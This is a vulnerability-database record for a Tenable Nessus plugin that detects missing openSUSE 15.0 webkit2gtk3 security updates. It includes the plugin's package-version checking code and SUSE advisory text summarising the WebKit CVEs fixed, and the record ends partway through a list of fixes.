{"id": "OPENSUSE-2019-566.NASL", "bulletinFamily": "scanner", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.", "published": "2019-03-27T00:00:00", "modified": "2019-03-27T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/123245", "reporter": "This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=1095611", "https://bugzilla.opensuse.org/show_bug.cgi?id=1097693"], "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "type": "nessus", "lastseen": "2020-09-23T16:46:40", "edition": 13, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["OPENSUSE-2018-845.NASL", "ITUNES_12_7_5.NASL", "APPLETV_11_4.NASL", "SUSE_SU-2018-2075-1.NASL", "FEDORA_2018-118B9ABF99.NASL", "UBUNTU_USN-3687-1.NASL", "MACOSX_SAFARI11_1_1.NASL", "SUSE_SU-2018-3387-1.NASL", "FEDORA_2018-AAC3CA8936.NASL", "ITUNES_12_7_5_BANNER.NASL"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:3473-1", "OPENSUSE-SU-2018:2285-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310874687", "OPENVAS:1361412562310843564", "OPENVAS:1361412562310813509", "OPENVAS:1361412562310851975", "OPENVAS:1361412562310813513", "OPENVAS:1361412562310852089", "OPENVAS:1361412562310874747", "OPENVAS:1361412562310813514"]}, {"type": "fedora", "idList": ["FEDORA:A7C5B60D2E0C", "FEDORA:EC42160A1040"]}, {"type": "ubuntu", "idList": ["USN-3687-1"]}, {"type": "cve", "idList": ["CVE-2018-4199", "CVE-2018-4218", "CVE-2018-4233", "CVE-2018-11646", "CVE-2018-4190", "CVE-2018-4222", "CVE-2018-4232"]}, {"type": "seebug", "idList": ["SSV:97335", "SSV:97334"]}, {"type": "apple", "idList": ["APPLE:HT208852", "APPLE:HT208850", "APPLE:HT208853", "APPLE:HT208851", "APPLE:HT208854", "APPLE:HT208848"]}, {"type": "kaspersky", "idList": ["KLA11282"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:150779", "PACKETSTORM:153148", "PACKETSTORM:148135", "PACKETSTORM:148053"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:031DF743451446CD96638EB1AA5E6C47", "EXPLOITPACK:C7B5D1AF7C2C90DC97EDE10892A220CC"]}, {"type": "exploitdb", "idList": ["EDB-ID:44842", "EDB-ID:44861", "EDB-ID:44859", "EDB-ID:45998", "EDB-ID:44876"]}, {"type": "zdt", "idList": ["1337DAY-ID-30538", "1337DAY-ID-31793", "1337DAY-ID-30560", "1337DAY-ID-30559", "1337DAY-ID-32828", "1337DAY-ID-30569"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION/", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS/", "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "MSF:EXPLOIT/OSX/BROWSER/SAFARI_PROXY_OBJECT_TYPE_CONFUSION", "MSF:EXPLOIT/APPLE_IOS/BROWSER/WEBKIT_CREATETHIS"]}, {"type": "zdi", "idList": ["ZDI-18-781", "ZDI-18-1321"]}, {"type": "gentoo", "idList": ["GLSA-201808-04"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:9418CBB054BDA9E57D7F2E7ABF5F7BE0"]}], "modified": "2020-09-23T16:46:40", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2020-09-23T16:46:40", "rev": 2}, "vulnersScore": 8.1}, "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-566.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123245);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/22\");\n\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-566)\");\n script_summary(english:\"Check for the openSUSE-2019-566 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the following\nissues :\n\nThese security issues were fixed :\n\n - CVE-2018-4190: An unspecified issue allowed remote\n attackers to obtain sensitive credential information\n that is transmitted during a CSS mask-image fetch\n (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (buffer overflow and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-4218: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website that triggers an @generatorState\n use-after-free (bsc#1097693) \n\n - CVE-2018-4222: An unspecified issue allowed remote\n attackers to execute arbitrary code via a crafted\n website that leverages a getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation\n (bsc#1097693) \n\n - CVE-2018-4232: An unspecified issue allowed remote\n attackers to overwrite cookies via a crafted website\n (bsc#1097693) \n\n - CVE-2018-4233: An unspecified issue allowed remote\n attackers to execute arbitrary code or cause a denial of\n service (memory corruption and application crash) via a\n crafted website (bsc#1097693) \n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL\n and webkitFaviconDatabaseSetIconURLForPageURL mishandle\n an unset pageURL, leading to an application crash\n (bsc#1095611).\n\nThese non-security issues were fixed :\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies\n of about:blank page.\n\n - Fix UI process crash when closing the window under\n Wayland.\n\n - Fix several crashes and rendering issues. This update\n was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.20.3-lp150.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.20.3-lp150.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-32bit / etc\");\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "123245", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo"], "scheme": null, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}}

{"suse": [{"lastseen": "2018-08-10T04:48:17", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2018-08-10T03:08:49", "published": "2018-08-10T03:08:49", "id": "OPENSUSE-SU-2018:2285-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-26T02:31:21", "bulletinFamily": "unix", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues:\n\n The following security vulnerabilities were addressed:\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n (boo#1101999)\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof\n user-interface information (about whether the entire content is derived\n from a valid TLS session) via a crafted web site that sends a 401\n Unauthorized redirect (bsc#1077535).\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute\n arbitrary code via special characters that trigger command injection\n (bsc#1075775, bsc#1077535).\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1075775).\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers a\n WebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n - CVE-2018-4204: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092279).\n - CVE-2018-4101: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4113: An issue in the JavaScriptCore function in the &quot;WebKit&quot;\n component allowed attackers to trigger an assertion failure by\n leveraging improper array indexing (bsc#1088182)\n - CVE-2018-4114: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4117: An unspecified issue allowed remote attackers to bypass\n the Same Origin Policy and obtain sensitive information via a crafted\n web site (bsc#1088182, bsc#1102530).\n - CVE-2018-4118: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4119: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182)\n - CVE-2018-4120: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4121: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1092278).\n - CVE-2018-4122: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4125: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4127: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4128: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4129: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4146: An unspecified issue allowed attackers to cause a denial\n of service (memory corruption) via a crafted web site (bsc#1088182).\n - CVE-2018-4161: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4162: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4163: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4165: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1088182).\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693)\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n - CVE-2018-4246: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages type confusion\n (bsc#1104169)\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\n leading to an application crash (bsc#1095611)\n - CVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability allowed\n remote attackers to inject arbitrary web script or HTML via a crafted\n URL (bsc#1088182).\n - CVE-2018-11713: The libsoup network backend of WebKit unexpectedly\n failed to use system proxy settings for WebSocket connections. As a\n result, users could be deanonymized by crafted web sites via a WebSocket\n connection (bsc#1096060).\n - CVE-2018-11712: The libsoup network backend of WebKit failed to perform\n TLS certificate verification for WebSocket connections (bsc#1096061).\n\n\n This update for webkit2gtk3 fixes the following issues:\n\n - Fixed a crash when atk_object_ref_state_set is called on an AtkObject\n that's being destroyed (bsc#1088932).\n - Fixed crash when using Wayland with QXL/virtio (bsc#1079512)\n - Disable Gigacage if mmap fails to allocate in Linux.\n - Add user agent quirk for paypal website.\n - Properly detect compiler flags, needed libs, and fallbacks for usage of\n 64-bit atomic operations.\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n - Fix UI process crash when closing the window under Wayland.\n - Fix several crashes and rendering issues.\n - Do TLS error checking on GTlsConnection::accept-certificate to finish\n the load earlier in case of errors.\n - Properly close the connection to the nested wayland compositor in the\n Web Process.\n - Avoid painting backing stores for zero-opacity layers.\n - Fix downloads started by context menu failing in some websites due to\n missing user agent HTTP header.\n - Fix video unpause when GStreamerGL is disabled.\n - Fix several GObject introspection annotations.\n - Update user agent quiks to fix Outlook.com and Chase.com.\n - Fix several crashes and rendering issues.\n - Improve error message when Gigacage cannot allocate virtual memory.\n - Add missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n - Improve web process memory monitor thresholds.\n - Fix a web process crash when the web view is created and destroyed\n quickly.\n - Fix a network process crash when load is cancelled while searching for\n stored HTTP auth credentials.\n - Fix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\n disabled.\n - New API to retrieve and delete cookies with WebKitCookieManager.\n - New web process API to detect when form is submitted via JavaScript.\n - Several improvements and fixes in the touch/gestures support.\n - Support for the \u00e2\u0080\u009csystem\u00e2\u0080\u009d CSS font family.\n - Complex text rendering improvements and fixes.\n - More complete and spec compliant WebDriver implementation.\n - Ensure DNS prefetching cannot be re-enabled if disabled by settings.\n - Fix seek sometimes not working.\n - Fix rendering of emojis that were using the wrong scale factor in some\n cases.\n - Fix rendering of combining enclosed keycap.\n - Fix rendering scale of some layers in HiDPI.\n - Fix a crash in Wayland when closing the web view.\n - Fix crashes upower crashes when running inside a chroot or on systems\n with broken dbus/upower.\n - Fix memory leaks in GStreamer media backend when using GStreamer 1.14.\n - Fix several crashes and rendering issues.\n - Add 